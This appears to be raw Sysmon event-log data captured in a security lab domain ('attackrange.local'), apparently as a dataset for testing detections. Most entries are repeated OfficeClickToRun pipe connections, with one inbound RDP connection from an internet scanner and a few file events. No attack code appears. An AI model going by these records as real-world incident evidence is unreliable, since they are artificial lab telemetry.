18141800x800000000000000078780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000078770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:09.809{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com56920-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 18141800x800000000000000078769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.951{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.935{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:11.810{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe2021-04-20 14:58:11.810 18141800x800000000000000078745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.810{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000050498Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:12.493{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AE1081DE45E2C066E4090A7C899421F,SHA256=7A5D9B6C73B3807EF9AD16B6FAB837B19097E792872571B6E16EE982FE53FF48,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000079008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.857{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000079000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.842{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078968Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078967Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078966Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078965Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078964Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078963Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078962Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078961Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078960Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078959Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078958Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078957Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078956Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078955Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078954Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078953Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078952Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078951Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078950Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:13.826{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078949Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 